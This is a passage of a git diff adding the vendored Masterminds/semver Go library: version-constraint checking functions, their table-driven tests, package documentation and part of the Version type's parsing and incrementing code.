+	if v.Prerelease() != "" && c.con.Prerelease() == "" {
+		return false
+	}
+
+	if !c.dirty {
+		return v.Compare(c.con) <= 0
+	}
+
+	if v.Major() > c.con.Major() {
+		return false
+	} else if v.Minor() > c.con.Minor() && !c.minorDirty {
+		return false
+	}
+
+	return true
+}
+
+// ~*, ~>* --> >= 0.0.0 (any)
+// ~2, ~2.x, ~2.x.x, ~>2, ~>2.x ~>2.x.x --> >=2.0.0, <3.0.0
+// ~2.0, ~2.0.x, ~>2.0, ~>2.0.x --> >=2.0.0, <2.1.0
+// ~1.2, ~1.2.x, ~>1.2, ~>1.2.x --> >=1.2.0, <1.3.0
+// ~1.2.3, ~>1.2.3 --> >=1.2.3, <1.3.0
+// ~1.2.0, ~>1.2.0 --> >=1.2.0, <1.3.0
+func constraintTilde(v *Version, c *constraint) bool {
+	// If there is a pre-release on the version but the constraint isn't looking
+	// for them assume that pre-releases are not compatible. See issue 21 for
+	// more details.
+	if v.Prerelease() != "" && c.con.Prerelease() == "" {
+		return false
+	}
+
+	if v.LessThan(c.con) {
+		return false
+	}
+
+	// ~0.0.0 is a special case where all constraints are accepted. It's
+	// equivalent to >= 0.0.0.
+	if c.con.Major() == 0 && c.con.Minor() == 0 && c.con.Patch() == 0 &&
+		!c.minorDirty && !c.patchDirty {
+		return true
+	}
+
+	if v.Major() != c.con.Major() {
+		return false
+	}
+
+	if v.Minor() != c.con.Minor() && !c.minorDirty {
+		return false
+	}
+
+	return true
+}
+
+// When there is a .x (dirty) status it automatically opts in to ~. Otherwise
+// it's a straight =
+func constraintTildeOrEqual(v *Version, c *constraint) bool {
+	// If there is a pre-release on the version but the constraint isn't looking
+	// for them assume that pre-releases are not compatible. See issue 21 for
+	// more details.
+	if v.Prerelease() != "" && c.con.Prerelease() == "" {
+		return false
+	}
+
+	if c.dirty {
+		c.msg = constraintMsg["~"]
+		return constraintTilde(v, c)
+	}
+
+	return v.Equal(c.con)
+}
+
+// ^* --> (any)
+// ^2, ^2.x, ^2.x.x --> >=2.0.0, <3.0.0
+// ^2.0, ^2.0.x --> >=2.0.0, <3.0.0
+// ^1.2, ^1.2.x --> >=1.2.0, <2.0.0
+// ^1.2.3 --> >=1.2.3, <2.0.0
+// ^1.2.0 --> >=1.2.0, <2.0.0
+func constraintCaret(v *Version, c *constraint) bool {
+	// If there is a pre-release on the version but the constraint isn't looking
+	// for them assume that pre-releases are not compatible. See issue 21 for
+	// more details.
+	if v.Prerelease() != "" && c.con.Prerelease() == "" {
+		return false
+	}
+
+	if v.LessThan(c.con) {
+		return false
+	}
+
+	if v.Major() != c.con.Major() {
+		return false
+	}
+
+	return true
+}
+
+var constraintRangeRegex *regexp.Regexp
+
+const cvRegex string = `v?([0-9|x|X|\*]+)(\.[0-9|x|X|\*]+)?(\.[0-9|x|X|\*]+)?` +
+	`(-([0-9A-Za-z\-]+(\.[0-9A-Za-z\-]+)*))?` +
+	`(\+([0-9A-Za-z\-]+(\.[0-9A-Za-z\-]+)*))?`
+
+func isX(x string) bool {
+	switch x {
+	case "x", "*", "X":
+		return true
+	default:
+		return false
+	}
+}
+
+func rewriteRange(i string) string {
+	m := constraintRangeRegex.FindAllStringSubmatch(i, -1)
+	if m == nil {
+		return i
+	}
+	o := i
+	for _, v := range m {
+		t := fmt.Sprintf(">= %s, <= %s", v[1], v[11])
+		o = strings.Replace(o, v[0], t, 1)
+	}
+
+	return o
+}
+
+// Detect if a version is not zero (0.0.0)
+func isNonZero(v *Version) bool {
+	if v.Major() != 0 || v.Minor() != 0 || v.Patch() != 0 || v.Prerelease() != "" {
+		return true
+	}
+
+	return false
+}
diff --git a/vendor/github.com/Masterminds/semver/constraints_test.go b/vendor/github.com/Masterminds/semver/constraints_test.go
new file mode 100644
index 0000000000..bf52c90bd2
--- /dev/null
+++ b/vendor/github.com/Masterminds/semver/constraints_test.go
@@ -0,0 +1,465 @@
+package semver
+
+import (
+	"reflect"
+	"testing"
+)
+
+func TestParseConstraint(t *testing.T) {
+	tests := []struct {
+		in  string
+		f   cfunc
+		v   string
+		err bool
+	}{
+		{">= 1.2", constraintGreaterThanEqual, "1.2.0", false},
+		{"1.0", constraintTildeOrEqual, "1.0.0", false},
+		{"foo", nil, "", true},
+		{"<= 1.2", constraintLessThanEqual, "1.2.0", false},
+		{"=< 1.2", constraintLessThanEqual, "1.2.0", false},
+		{"=> 1.2", constraintGreaterThanEqual, "1.2.0", false},
+		{"v1.2", constraintTildeOrEqual, "1.2.0", false},
+		{"=1.5", constraintTildeOrEqual, "1.5.0", false},
+		{"> 1.3", constraintGreaterThan, "1.3.0", false},
+		{"< 1.4.1", constraintLessThan, "1.4.1", false},
+	}
+
+	for _, tc := range tests {
+		c, err := parseConstraint(tc.in)
+		if tc.err && err == nil {
+			t.Errorf("Expected error for %s didn't occur", tc.in)
+		} else if !tc.err && err != nil {
+			t.Errorf("Unexpected error for %s", tc.in)
+		}
+
+		// If an error was expected continue the loop and don't try the other
+		// tests as they will cause errors.
+		if tc.err {
+			continue
+		}
+
+		if tc.v != c.con.String() {
+			t.Errorf("Incorrect version found on %s", tc.in)
+		}
+
+		f1 := reflect.ValueOf(tc.f)
+		f2 := reflect.ValueOf(c.function)
+		if f1 != f2 {
+			t.Errorf("Wrong constraint found for %s", tc.in)
+		}
+	}
+}
+
+func TestConstraintCheck(t *testing.T) {
+	tests := []struct {
+		constraint string
+		version    string
+		check      bool
+	}{
+		{"= 2.0", "1.2.3", false},
+		{"= 2.0", "2.0.0", true},
+		{"4.1", "4.1.0", true},
+		{"!=4.1", "4.1.0", false},
+		{"!=4.1", "5.1.0", true},
+		{">1.1", "4.1.0", true},
+		{">1.1", "1.1.0", false},
+		{"<1.1", "0.1.0", true},
+		{"<1.1", "1.1.0", false},
+		{"<1.1", "1.1.1", false},
+		{">=1.1", "4.1.0", true},
+		{">=1.1", "1.1.0", true},
+		{">=1.1", "0.0.9", false},
+		{"<=1.1", "0.1.0", true},
+		{"<=1.1", "1.1.0", true},
+		{"<=1.1", "1.1.1", false},
+		{">0", "0.0.1-alpha", true},
+		{">=0", "0.0.1-alpha", true},
+		{">0", "0", false},
+		{">=0", "0", true},
+		{"=0", "1", false},
+	}
+
+	for _, tc := range tests {
+		c, err := parseConstraint(tc.constraint)
+		if err != nil {
+			t.Errorf("err: %s", err)
+			continue
+		}
+
+		v, err := NewVersion(tc.version)
+		if err != nil {
+			t.Errorf("err: %s", err)
+			continue
+		}
+
+		a := c.check(v)
+		if a != tc.check {
+			t.Errorf("Constraint %q failing with %q", tc.constraint, tc.version)
+		}
+	}
+}
+
+func TestNewConstraint(t *testing.T) {
+	tests := []struct {
+		input string
+		ors   int
+		count int
+		err   bool
+	}{
+		{">= 1.1", 1, 1, false},
+		{"2.0", 1, 1, false},
+		{"v2.3.5-20161202202307-sha.e8fc5e5", 1, 1, false},
+		{">= bar", 0, 0, true},
+		{">= 1.2.3, < 2.0", 1, 2, false},
+		{">= 1.2.3, < 2.0 || => 3.0, < 4", 2, 2, false},
+
+		// The 3 - 4 should be broken into 2 by the range rewriting
+		{"3 - 4 || => 3.0, < 4", 2, 2, false},
+	}
+
+	for _, tc := range tests {
+		v, err := NewConstraint(tc.input)
+		if tc.err && err == nil {
+			t.Errorf("expected but did not get error for: %s", tc.input)
+			continue
+		} else if !tc.err && err != nil {
+			t.Errorf("unexpectederror for input %s: %s", tc.input, err)
+			continue
+		}
+		if tc.err {
+			continue
+		}
+
+		l := len(v.constraints)
+		if tc.ors != l {
+			t.Errorf("Expected %s to have %d ORs but got %d",
+				tc.input, tc.ors, l)
+		}
+
+		l = len(v.constraints[0])
+		if tc.count != l {
+			t.Errorf("Expected %s to have %d constraints but got %d",
+				tc.input, tc.count, l)
+		}
+	}
+}
+
+func TestConstraintsCheck(t *testing.T) {
+	tests := []struct {
+		constraint string
+		version    string
+		check      bool
+	}{
+		{"*", "1.2.3", true},
+		{"~0.0.0", "1.2.3", true},
+		{"0.x.x", "1.2.3", false},
+		{"0.0.x", "1.2.3", false},
+		{"0.0.0", "1.2.3", false},
+		{"*", "1.2.3", true},
+		{"^0.0.0", "1.2.3", false},
+		{"= 2.0", "1.2.3", false},
+		{"= 2.0", "2.0.0", true},
+		{"4.1", "4.1.0", true},
+		{"4.1.x", "4.1.3", true},
+		{"1.x", "1.4", true},
+		{"!=4.1", "4.1.0", false},
+		{"!=4.1-alpha", "4.1.0-alpha", false},
+		{"!=4.1-alpha", "4.1.0", true},
+		{"!=4.1", "5.1.0", true},
+		{"!=4.x", "5.1.0", true},
+		{"!=4.x", "4.1.0", false},
+		{"!=4.1.x", "4.2.0", true},
+		{"!=4.2.x", "4.2.3", false},
+		{">1.1", "4.1.0", true},
+		{">1.1", "1.1.0", false},
+		{"<1.1", "0.1.0", true},
+		{"<1.1", "1.1.0", false},
+		{"<1.1", "1.1.1", false},
+		{"<1.x", "1.1.1", true},
+		{"<1.x", "2.1.1", false},
+		{"<1.1.x", "1.2.1", false},
+		{"<1.1.x", "1.1.500", true},
+		{"<1.2.x", "1.1.1", true},
+		{">=1.1", "4.1.0", true},
+		{">=1.1", "4.1.0-beta", false},
+		{">=1.1", "1.1.0", true},
+		{">=1.1", "0.0.9", false},
+		{"<=1.1", "0.1.0", true},
+		{"<=1.1", "0.1.0-alpha", false},
+		{"<=1.1-a", "0.1.0-alpha", true},
+		{"<=1.1", "1.1.0", true},
+		{"<=1.x", "1.1.0", true},
+		{"<=2.x", "3.1.0", false},
+		{"<=1.1", "1.1.1", false},
+		{"<=1.1.x", "1.2.500", false},
+		{">1.1, <2", "1.1.1", true},
+		{">1.1, <3", "4.3.2", false},
+		{">=1.1, <2, !=1.2.3", "1.2.3", false},
+		{">=1.1, <2, !=1.2.3 || > 3", "3.1.2", true},
+		{">=1.1, <2, !=1.2.3 || >= 3", "3.0.0", true},
+		{">=1.1, <2, !=1.2.3 || > 3", "3.0.0", false},
+		{">=1.1, <2, !=1.2.3 || > 3", "1.2.3", false},
+		{"1.1 - 2", "1.1.1", true},
+		{"1.1-3", "4.3.2", false},
+		{"^1.1", "1.1.1", true},
+		{"^1.1", "4.3.2", false},
+		{"^1.x", "1.1.1", true},
+		{"^2.x", "1.1.1", false},
+		{"^1.x", "2.1.1", false},
+		{"^1.x", "1.1.1-beta1", false},
+		{"^1.1.2-alpha", "1.2.1-beta1", true},
+		{"^1.2.x-alpha", "1.1.1-beta1", false},
+		{"~*", "2.1.1", true},
+		{"~1", "2.1.1", false},
+		{"~1", "1.3.5", true},
+		{"~1", "1.4", true},
+		{"~1.x", "2.1.1", false},
+		{"~1.x", "1.3.5", true},
+		{"~1.x", "1.4", true},
+		{"~1.1", "1.1.1", true},
+		{"~1.1", "1.1.1-alpha", false},
+		{"~1.1-alpha", "1.1.1-beta", true},
+		{"~1.1.1-beta", "1.1.1-alpha", false},
+		{"~1.1.1-beta", "1.1.1", true},
+		{"~1.2.3", "1.2.5", true},
+		{"~1.2.3", "1.2.2", false},
+		{"~1.2.3", "1.3.2", false},
+		{"~1.1", "1.2.3", false},
+		{"~1.3", "2.4.5", false},
+	}
+
+	for _, tc := range tests {
+		c, err := NewConstraint(tc.constraint)
+		if err != nil {
+			t.Errorf("err: %s", err)
+			continue
+		}
+
+		v, err := NewVersion(tc.version)
+		if err != nil {
+			t.Errorf("err: %s", err)
+			continue
+		}
+
+		a := c.Check(v)
+		if a != tc.check {
+			t.Errorf("Constraint '%s' failing with '%s'", tc.constraint, tc.version)
+		}
+	}
+}
+
+func TestRewriteRange(t *testing.T) {
+	tests := []struct {
+		c  string
+		nc string
+	}{
+		{"2 - 3", ">= 2, <= 3"},
+		{"2 - 3, 2 - 3", ">= 2, <= 3,>= 2, <= 3"},
+		{"2 - 3, 4.0.0 - 5.1", ">= 2, <= 3,>= 4.0.0, <= 5.1"},
+	}
+
+	for _, tc := range tests {
+		o := rewriteRange(tc.c)
+
+		if o != tc.nc {
+			t.Errorf("Range %s rewritten incorrectly as '%s'", tc.c, o)
+		}
+	}
+}
+
+func TestIsX(t *testing.T) {
+	tests := []struct {
+		t string
+		c bool
+	}{
+		{"A", false},
+		{"%", false},
+		{"X", true},
+		{"x", true},
+		{"*", true},
+	}
+
+	for _, tc := range tests {
+		a := isX(tc.t)
+		if a != tc.c {
+			t.Errorf("Function isX error on %s", tc.t)
+		}
+	}
+}
+
+func TestConstraintsValidate(t *testing.T) {
+	tests := []struct {
+		constraint string
+		version    string
+		check      bool
+	}{
+		{"*", "1.2.3", true},
+		{"~0.0.0", "1.2.3", true},
+		{"= 2.0", "1.2.3", false},
+		{"= 2.0", "2.0.0", true},
+		{"4.1", "4.1.0", true},
+		{"4.1.x", "4.1.3", true},
+		{"1.x", "1.4", true},
+		{"!=4.1", "4.1.0", false},
+		{"!=4.1", "5.1.0", true},
+		{"!=4.x", "5.1.0", true},
+		{"!=4.x", "4.1.0", false},
+		{"!=4.1.x", "4.2.0", true},
+		{"!=4.2.x", "4.2.3", false},
+		{">1.1", "4.1.0", true},
+		{">1.1", "1.1.0", false},
+		{"<1.1", "0.1.0", true},
+		{"<1.1", "1.1.0", false},
+		{"<1.1", "1.1.1", false},
+		{"<1.x", "1.1.1", true},
+		{"<1.x", "2.1.1", false},
+		{"<1.1.x", "1.2.1", false},
+		{"<1.1.x", "1.1.500", true},
+		{"<1.2.x", "1.1.1", true},
+		{">=1.1", "4.1.0", true},
+		{">=1.1", "1.1.0", true},
+		{">=1.1", "0.0.9", false},
+		{"<=1.1", "0.1.0", true},
+		{"<=1.1", "1.1.0", true},
+		{"<=1.x", "1.1.0", true},
+		{"<=2.x", "3.1.0", false},
+		{"<=1.1", "1.1.1", false},
+		{"<=1.1.x", "1.2.500", false},
+		{">1.1, <2", "1.1.1", true},
+		{">1.1, <3", "4.3.2", false},
+		{">=1.1, <2, !=1.2.3", "1.2.3", false},
+		{">=1.1, <2, !=1.2.3 || > 3", "3.1.2", true},
+		{">=1.1, <2, !=1.2.3 || >= 3", "3.0.0", true},
+		{">=1.1, <2, !=1.2.3 || > 3", "3.0.0", false},
+		{">=1.1, <2, !=1.2.3 || > 3", "1.2.3", false},
+		{"1.1 - 2", "1.1.1", true},
+		{"1.1-3", "4.3.2", false},
+		{"^1.1", "1.1.1", true},
+		{"^1.1", "1.1.1-alpha", false},
+		{"^1.1.1-alpha", "1.1.1-beta", true},
+		{"^1.1.1-beta", "1.1.1-alpha", false},
+		{"^1.1", "4.3.2", false},
+		{"^1.x", "1.1.1", true},
+		{"^2.x", "1.1.1", false},
+		{"^1.x", "2.1.1", false},
+		{"~*", "2.1.1", true},
+		{"~1", "2.1.1", false},
+		{"~1", "1.3.5", true},
+		{"~1", "1.3.5-beta", false},
+		{"~1.x", "2.1.1", false},
+		{"~1.x", "1.3.5", true},
+		{"~1.x", "1.3.5-beta", false},
+		{"~1.3.6-alpha", "1.3.5-beta", false},
+		{"~1.3.5-alpha", "1.3.5-beta", true},
+		{"~1.3.5-beta", "1.3.5-alpha", false},
+		{"~1.x", "1.4", true},
+		{"~1.1", "1.1.1", true},
+		{"~1.2.3", "1.2.5", true},
+		{"~1.2.3", "1.2.2", false},
+		{"~1.2.3", "1.3.2", false},
+		{"~1.1", "1.2.3", false},
+		{"~1.3", "2.4.5", false},
+	}
+
+	for _, tc := range tests {
+		c, err := NewConstraint(tc.constraint)
+		if err != nil {
+			t.Errorf("err: %s", err)
+			continue
+		}
+
+		v, err := NewVersion(tc.version)
+		if err != nil {
+			t.Errorf("err: %s", err)
+			continue
+		}
+
+		a, msgs := c.Validate(v)
+		if a != tc.check {
+			t.Errorf("Constraint '%s' failing with '%s'", tc.constraint, tc.version)
+		} else if !a && len(msgs) == 0 {
+			t.Errorf("%q failed with %q but no errors returned", tc.constraint, tc.version)
+		}
+
+		// if a == false {
+		// 	for _, m := range msgs {
+		// 		t.Errorf("%s", m)
+		// 	}
+		// }
+	}
+
+	v, err := NewVersion("1.2.3")
+	if err != nil {
+		t.Errorf("err: %s", err)
+	}
+
+	c, err := NewConstraint("!= 1.2.5, ^2, <= 1.1.x")
+	if err != nil {
+		t.Errorf("err: %s", err)
+	}
+
+	_, msgs := c.Validate(v)
+	if len(msgs) != 2 {
+		t.Error("Invalid number of validations found")
+	}
+	e := msgs[0].Error()
+	if e != "1.2.3 does not have same major version as 2" {
+		t.Error("Did not get expected message: 1.2.3 does not have same major version as 2")
+	}
+	e = msgs[1].Error()
+	if e != "1.2.3 is greater than 1.1.x" {
+		t.Error("Did not get expected message: 1.2.3 is greater than 1.1.x")
+	}
+
+	tests2 := []struct {
+		constraint, version, msg string
+	}{
+		{"= 2.0", "1.2.3", "1.2.3 is not equal to 2.0"},
+		{"!=4.1", "4.1.0", "4.1.0 is equal to 4.1"},
+		{"!=4.x", "4.1.0", "4.1.0 is equal to 4.x"},
+		{"!=4.2.x", "4.2.3", "4.2.3 is equal to 4.2.x"},
+		{">1.1", "1.1.0", "1.1.0 is less than or equal to 1.1"},
+		{"<1.1", "1.1.0", "1.1.0 is greater than or equal to 1.1"},
+		{"<1.1", "1.1.1", "1.1.1 is greater than or equal to 1.1"},
+		{"<1.x", "2.1.1", "2.1.1 is greater than or equal to 1.x"},
+		{"<1.1.x", "1.2.1", "1.2.1 is greater than or equal to 1.1.x"},
+		{">=1.1", "0.0.9", "0.0.9 is less than 1.1"},
+		{"<=2.x", "3.1.0", "3.1.0 is greater than 2.x"},
+		{"<=1.1", "1.1.1", "1.1.1 is greater than 1.1"},
+		{"<=1.1.x", "1.2.500", "1.2.500 is greater than 1.1.x"},
+		{">1.1, <3", "4.3.2", "4.3.2 is greater than or equal to 3"},
+		{">=1.1, <2, !=1.2.3", "1.2.3", "1.2.3 is equal to 1.2.3"},
+		{">=1.1, <2, !=1.2.3 || > 3", "3.0.0", "3.0.0 is greater than or equal to 2"},
+		{">=1.1, <2, !=1.2.3 || > 3", "1.2.3", "1.2.3 is equal to 1.2.3"},
+		{"1.1 - 3", "4.3.2", "4.3.2 is greater than 3"},
+		{"^1.1", "4.3.2", "4.3.2 does not have same major version as 1.1"},
+		{"^2.x", "1.1.1", "1.1.1 does not have same major version as 2.x"},
+		{"^1.x", "2.1.1", "2.1.1 does not have same major version as 1.x"},
+		{"~1", "2.1.2", "2.1.2 does not have same major and minor version as 1"},
+		{"~1.x", "2.1.1", "2.1.1 does not have same major and minor version as 1.x"},
+		{"~1.2.3", "1.2.2", "1.2.2 does not have same major and minor version as 1.2.3"},
+		{"~1.2.3", "1.3.2", "1.3.2 does not have same major and minor version as 1.2.3"},
+		{"~1.1", "1.2.3", "1.2.3 does not have same major and minor version as 1.1"},
+		{"~1.3", "2.4.5", "2.4.5 does not have same major and minor version as 1.3"},
+	}
+
+	for _, tc := range tests2 {
+		c, err := NewConstraint(tc.constraint)
+		if err != nil {
+			t.Errorf("err: %s", err)
+			continue
+		}
+
+		v, err := NewVersion(tc.version)
+		if err != nil {
+			t.Errorf("err: %s", err)
+			continue
+		}
+
+		_, msgs := c.Validate(v)
+		e := msgs[0].Error()
+		if e != tc.msg {
+			t.Errorf("Did not get expected message %q: %s", tc.msg, e)
+		}
+	}
+}
diff --git a/vendor/github.com/Masterminds/semver/doc.go b/vendor/github.com/Masterminds/semver/doc.go
new file mode 100644
index 0000000000..e00f65eb73
--- /dev/null
+++ b/vendor/github.com/Masterminds/semver/doc.go
@@ -0,0 +1,115 @@
+/*
+Package semver provides the ability to work with Semantic Versions (http://semver.org) in Go.
+
+Specifically it provides the ability to:
+
+    * Parse semantic versions
+    * Sort semantic versions
+    * Check if a semantic version fits within a set of constraints
+    * Optionally work with a `v` prefix
+
+Parsing Semantic Versions
+
+To parse a semantic version use the `NewVersion` function. For example,
+
+    v, err := semver.NewVersion("1.2.3-beta.1+build345")
+
+If there is an error the version wasn't parseable. The version object has methods
+to get the parts of the version, compare it to other versions, convert the
+version back into a string, and get the original string. For more details
+please see the documentation at https://godoc.org/github.com/Masterminds/semver.
+
+Sorting Semantic Versions
+
+A set of versions can be sorted using the `sort` package from the standard library.
+For example,
+
+    raw := []string{"1.2.3", "1.0", "1.3", "2", "0.4.2",}
+    vs := make([]*semver.Version, len(raw))
+	for i, r := range raw {
+		v, err := semver.NewVersion(r)
+		if err != nil {
+			t.Errorf("Error parsing version: %s", err)
+		}
+
+		vs[i] = v
+	}
+
+	sort.Sort(semver.Collection(vs))
+
+Checking Version Constraints
+
+Checking a version against version constraints is one of the most featureful
+parts of the package.
+
+    c, err := semver.NewConstraint(">= 1.2.3")
+    if err != nil {
+        // Handle constraint not being parseable.
+    }
+
+    v, _ := semver.NewVersion("1.3")
+    if err != nil {
+        // Handle version not being parseable.
+    }
+    // Check if the version meets the constraints. The a variable will be true.
+    a := c.Check(v)
+
+Basic Comparisons
+
+There are two elements to the comparisons. First, a comparison string is a list
+of comma separated and comparisons. These are then separated by || separated or
+comparisons. For example, `">= 1.2, < 3.0.0 || >= 4.2.3"` is looking for a
+comparison that's greater than or equal to 1.2 and less than 3.0.0 or is
+greater than or equal to 4.2.3.
+
+The basic comparisons are:
+
+    * `=`: equal (aliased to no operator)
+    * `!=`: not equal
+    * `>`: greater than
+    * `<`: less than
+    * `>=`: greater than or equal to
+    * `<=`: less than or equal to
+
+Hyphen Range Comparisons
+
+There are multiple methods to handle ranges and the first is hyphens ranges.
+These look like:
+
+    * `1.2 - 1.4.5` which is equivalent to `>= 1.2, <= 1.4.5`
+    * `2.3.4 - 4.5` which is equivalent to `>= 2.3.4, <= 4.5`
+
+Wildcards In Comparisons
+
+The `x`, `X`, and `*` characters can be used as a wildcard character. This works
+for all comparison operators. When used on the `=` operator it falls
+back to the pack level comparison (see tilde below). For example,
+
+    * `1.2.x` is equivalent to `>= 1.2.0, < 1.3.0`
+    * `>= 1.2.x` is equivalent to `>= 1.2.0`
+    * `<= 2.x` is equivalent to `<= 3`
+    * `*` is equivalent to `>= 0.0.0`
+
+Tilde Range Comparisons (Patch)
+
+The tilde (`~`) comparison operator is for patch level ranges when a minor
+version is specified and major level changes when the minor number is missing.
+For example,
+
+    * `~1.2.3` is equivalent to `>= 1.2.3, < 1.3.0`
+    * `~1` is equivalent to `>= 1, < 2`
+    * `~2.3` is equivalent to `>= 2.3, < 2.4`
+    * `~1.2.x` is equivalent to `>= 1.2.0, < 1.3.0`
+    * `~1.x` is equivalent to `>= 1, < 2`
+
+Caret Range Comparisons (Major)
+
+The caret (`^`) comparison operator is for major level changes. This is useful
+when comparisons of API versions as a major change is API breaking. For example,
+
+    * `^1.2.3` is equivalent to `>= 1.2.3, < 2.0.0`
+    * `^1.2.x` is equivalent to `>= 1.2.0, < 2.0.0`
+    * `^2.3` is equivalent to `>= 2.3, < 3`
+    * `^2.x` is equivalent to `>= 2.0.0, < 3`
+*/
+package semver
diff --git a/vendor/github.com/Masterminds/semver/version.go b/vendor/github.com/Masterminds/semver/version.go
new file mode 100644
index 0000000000..9d22ea6308
--- /dev/null
+++ b/vendor/github.com/Masterminds/semver/version.go
@@ -0,0 +1,421 @@
+package semver
+
+import (
+	"bytes"
+	"encoding/json"
+	"errors"
+	"fmt"
+	"regexp"
+	"strconv"
+	"strings"
+)
+
+// The compiled version of the regex created at init() is cached here so it
+// only needs to be created once.
+var versionRegex *regexp.Regexp
+var validPrereleaseRegex *regexp.Regexp
+
+var (
+	// ErrInvalidSemVer is returned a version is found to be invalid when
+	// being parsed.
+	ErrInvalidSemVer = errors.New("Invalid Semantic Version")
+
+	// ErrInvalidMetadata is returned when the metadata is an invalid format
+	ErrInvalidMetadata = errors.New("Invalid Metadata string")
+
+	// ErrInvalidPrerelease is returned when the pre-release is an invalid format
+	ErrInvalidPrerelease = errors.New("Invalid Prerelease string")
+)
+
+// SemVerRegex is the regular expression used to parse a semantic version.
+const SemVerRegex string = `v?([0-9]+)(\.[0-9]+)?(\.[0-9]+)?` +
+	`(-([0-9A-Za-z\-]+(\.[0-9A-Za-z\-]+)*))?` +
+	`(\+([0-9A-Za-z\-]+(\.[0-9A-Za-z\-]+)*))?`
+
+// ValidPrerelease is the regular expression which validates
+// both prerelease and metadata values.
+const ValidPrerelease string = `^([0-9A-Za-z\-]+(\.[0-9A-Za-z\-]+)*)`
+
+// Version represents a single semantic version.
+type Version struct {
+	major, minor, patch int64
+	pre                 string
+	metadata            string
+	original            string
+}
+
+func init() {
+	versionRegex = regexp.MustCompile("^" + SemVerRegex + "$")
+	validPrereleaseRegex = regexp.MustCompile(ValidPrerelease)
+}
+
+// NewVersion parses a given version and returns an instance of Version or
+// an error if unable to parse the version.
+func NewVersion(v string) (*Version, error) {
+	m := versionRegex.FindStringSubmatch(v)
+	if m == nil {
+		return nil, ErrInvalidSemVer
+	}
+
+	sv := &Version{
+		metadata: m[8],
+		pre:      m[5],
+		original: v,
+	}
+
+	var temp int64
+	temp, err := strconv.ParseInt(m[1], 10, 64)
+	if err != nil {
+		return nil, fmt.Errorf("Error parsing version segment: %s", err)
+	}
+	sv.major = temp
+
+	if m[2] != "" {
+		temp, err = strconv.ParseInt(strings.TrimPrefix(m[2], "."), 10, 64)
+		if err != nil {
+			return nil, fmt.Errorf("Error parsing version segment: %s", err)
+		}
+		sv.minor = temp
+	} else {
+		sv.minor = 0
+	}
+
+	if m[3] != "" {
+		temp, err = strconv.ParseInt(strings.TrimPrefix(m[3], "."), 10, 64)
+		if err != nil {
+			return nil, fmt.Errorf("Error parsing version segment: %s", err)
+		}
+		sv.patch = temp
+	} else {
+		sv.patch = 0
+	}
+
+	return sv, nil
+}
+
+// MustParse parses a given version and panics on error.
+func MustParse(v string) *Version {
+	sv, err := NewVersion(v)
+	if err != nil {
+		panic(err)
+	}
+	return sv
+}
+
+// String converts a Version object to a string.
+// Note, if the original version contained a leading v this version will not.
+// See the Original() method to retrieve the original value. Semantic Versions
+// don't contain a leading v per the spec. Instead it's optional on
+// impelementation.
+func (v *Version) String() string {
+	var buf bytes.Buffer
+
+	fmt.Fprintf(&buf, "%d.%d.%d", v.major, v.minor, v.patch)
+	if v.pre != "" {
+		fmt.Fprintf(&buf, "-%s", v.pre)
+	}
+	if v.metadata != "" {
+		fmt.Fprintf(&buf, "+%s", v.metadata)
+	}
+
+	return buf.String()
+}
+
+// Original returns the original value passed in to be parsed.
+func (v *Version) Original() string {
+	return v.original
+}
+
+// Major returns the major version.
+func (v *Version) Major() int64 {
+	return v.major
+}
+
+// Minor returns the minor version.
+func (v *Version) Minor() int64 {
+	return v.minor
+}
+
+// Patch returns the patch version.
+func (v *Version) Patch() int64 {
+	return v.patch
+}
+
+// Prerelease returns the pre-release version.
+func (v *Version) Prerelease() string {
+	return v.pre
+}
+
+// Metadata returns the metadata on the version.
+func (v *Version) Metadata() string {
+	return v.metadata
+}
+
+// originalVPrefix returns the original 'v' prefix if any.
+func (v *Version) originalVPrefix() string {
+
+	// Note, only lowercase v is supported as a prefix by the parser.
+	if v.original != "" && v.original[:1] == "v" {
+		return v.original[:1]
+	}
+	return ""
+}
+
+// IncPatch produces the next patch version.
+// If the current version does not have prerelease/metadata information,
+// it unsets metadata and prerelease values, increments patch number.
+// If the current version has any of prerelease or metadata information,
+// it unsets both values and keeps curent patch value
+func (v Version) IncPatch() Version {
+	vNext := v
+	// according to http://semver.org/#spec-item-9
+	// Pre-release versions have a lower precedence than the associated normal version.
+	// according to http://semver.org/#spec-item-10
+	// Build metadata SHOULD be ignored when determining version precedence.
+	if v.pre != "" {
+		vNext.metadata = ""
+		vNext.pre = ""
+	} else {
+		vNext.metadata = ""
+		vNext.pre = ""
+		vNext.patch = v.patch + 1
+	}
+	vNext.original = v.originalVPrefix() + "" + vNext.String()
+	return vNext
+}
+
+// IncMinor produces the next minor version.
+// Sets patch to 0.
+// Increments minor number.
+// Unsets metadata.
+// Unsets prerelease status.
+func (v Version) IncMinor() Version {
+	vNext := v
+	vNext.metadata = ""
+	vNext.pre = ""
+	vNext.patch = 0
+	vNext.minor = v.minor + 1
+	vNext.original = v.originalVPrefix() + "" + vNext.String()
+	return vNext
+}
+
+// IncMajor produces the next major version.
+// Sets patch to 0.
+// Sets minor to 0.
+// Increments major number.
+// Unsets metadata.
+// Unsets prerelease status.
+func (v Version) IncMajor() Version {
+	vNext := v
+	vNext.metadata = ""
+	vNext.pre = ""
+	vNext.patch = 0
+	vNext.minor = 0
+	vNext.major = v.major + 1
+	vNext.original = v.originalVPrefix() + "" + vNext.String()
+	return vNext
+}
+
+// SetPrerelease defines the prerelease value.
+// Value must not include the required 'hypen' prefix.
+func (v Version) SetPrerelease(prerelease string) (Version, error) {
+	vNext := v
+	if len(prerelease) > 0 && !validPrereleaseRegex.MatchString(prerelease) {
+		return vNext, ErrInvalidPrerelease
+	}
+	vNext.pre = prerelease
+	vNext.original = v.originalVPrefix() + "" + vNext.String()
+	return vNext, nil
+}
+
+// SetMetadata defines metadata value.
+// Value must not include the required 'plus' prefix.
+func (v Version) SetMetadata(metadata string) (Version, error) {
+	vNext := v
+	if len(metadata) > 0 && !validPrereleaseRegex.MatchString(metadata) {
+		return vNext, ErrInvalidMetadata
+	}
+	vNext.metadata = metadata
+	vNext.original = v.originalVPrefix() + "" + vNext.String()
+	return vNext, nil
+}
+
+// LessThan tests if one version is less than another one.
+func (v *Version) LessThan(o *Version) bool {
+	return v.Compare(o) < 0
+}
+
+// GreaterThan tests if one version is greater than another one.
+func (v *Version) GreaterThan(o *Version) bool {
+	return v.Compare(o) > 0
+}
+
+// Equal tests if two versions are equal to each other.
+// Note, versions can be equal with different metadata since metadata
+// is not considered part of the comparable version.
+func (v *Version) Equal(o *Version) bool {
+	return v.Compare(o) == 0
+}
+
+// Compare compares this version to another one. It returns -1, 0, or 1 if
+// the version smaller, equal, or larger than the other version.
+//
